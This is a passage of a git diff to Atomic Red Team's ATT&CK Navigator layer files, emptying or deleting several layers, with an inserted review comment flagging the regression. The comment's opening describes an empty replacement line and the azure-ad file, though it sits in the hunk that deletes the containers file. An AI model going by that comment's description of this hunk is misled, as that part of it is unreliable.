Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
\ No newline at end of file
+
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
index 69180529..e69de29b 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
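Review bot: The new side of this hunk is a single empty line, so art-navigator-layer-azure-ad.json no longer contains a Navigator layer document, even though the removed line already carried the per-technique `links` objects this commit is meant to add. The google-workspace and iaas layers receive the same empty replacement and the containers layer is deleted outright, so the regression is not limited to one file. These files are generated by bin/generate-atomic-docs.rb (listed in the diffstat), so presumably the checked-in artifacts were produced by a generator run that emitted nothing for these layers — possibly the new "only adds links when parent technique actually has a yaml" filter is gating the whole technique entry rather than just its link; that should be confirmed and the layers regenerated before merge. A lightweight CI assertion that each layer file parses as JSON and has a non-empty `techniques` array would catch this class of empty-artifact commit in future.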
@@ -1 +0,0 @@
-{"version":"4.3","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
index 5d57adec..8b137891 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
@@ -1 +1 @@
-{"version":"4.3","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
\ No newline at end of file
+
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
index 42be7106..8b137891 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
@@ -1 +1 @@
-{"version":"4.3","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
\ No newline at end of file
+
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index ff6a3888..8b137891 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View 
